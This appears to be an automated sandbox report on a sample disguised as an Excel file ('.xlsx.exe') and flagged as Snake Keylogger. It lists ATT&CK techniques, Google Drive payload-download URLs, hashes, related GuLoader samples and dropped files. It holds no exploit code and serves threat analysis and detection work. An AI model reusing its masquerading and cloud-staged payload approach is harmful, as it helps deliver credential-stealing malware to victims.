      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00405F6A GetVersion,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,LdrInitializeThunk,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      09-FD-94.03.60.175.07.xlsx.exe55%ReversingLabsWin32.Trojan.SnakeKeylogger
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://drive.usercontef0%Avira URL Cloudsafe
      https://drive.goF0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.1
        truefalse
          high
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://drive.google.com/;09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/letagservices-cn.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.google.com/recaptcha.net.cn09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://translate.google.com/translate_a/element.js09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/709-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.google.com/qf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/R09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/r09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEfl09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706592766.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861593384.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3994935047.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/download?id=1DRkx09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://apis.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://nsis.sf.net/NSIS_ErrorError09-FD-94.03.60.175.07.xlsx.exefalse
                                          high
                                          https://drive.google.com/i09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/G09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.com/E09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontef09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://drive.google.com/catig09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/tagmanager.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/ificate09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/t/allowlist09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.goF09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.181.1
                                                        drive.usercontent.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        172.217.19.174
                                                        drive.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1576274
                                                        Start date and time:2024-12-16 18:03:58 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 43s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:09-FD-94.03.60.175.07.xlsx.exe
                                                        Detection:MAL
                                                        Classification:mal76.troj.evad.winEXE@3/10@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 48
                                                        • Number of non-executed functions: 76
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 40.126.53.7, 20.103.156.88, 13.107.246.63, 52.149.20.212, 20.223.35.26, 2.16.158.72, 20.234.120.54, 150.171.28.10, 2.16.158.74, 23.218.208.109
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com
                                                        • Execution Graph export aborted for target 09-FD-94.03.60.175.07.xlsx.exe, PID 5412 because there are no executed function
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: 09-FD-94.03.60.175.07.xlsx.exe
                                                        No simulations
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        fp2e7a.wpc.phicdn.netwf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                        • 192.229.221.95
                                                        YPgggL1oh7.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        SPHINX.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        AV4b38nlhN.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                        • 192.229.221.95
                                                        msimg32.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 192.229.221.95
                                                        YBkzZEtVcK.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        xGW5bGPCIg.exeGet hashmaliciousCryptbotBrowse
                                                        • 192.229.221.95
                                                        SOjID1t3un.exeGet hashmaliciousLummaCBrowse
                                                        • 192.229.221.95
                                                        https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.221.95
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 142.250.181.1
                                                        • 172.217.19.174
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dllME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                          TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                            Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                                                  debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                                                    HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                                      HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                                        z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):45
                                                                          Entropy (8bit):4.7748605961854445
                                                                          Encrypted:false
                                                                          SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                                          MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                                          SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                                          SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                                          SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):11776
                                                                          Entropy (8bit):5.656006343879828
                                                                          Encrypted:false
                                                                          SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                                          MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                                          SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                                          SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                                          SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                                          • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                                          • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                                          • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
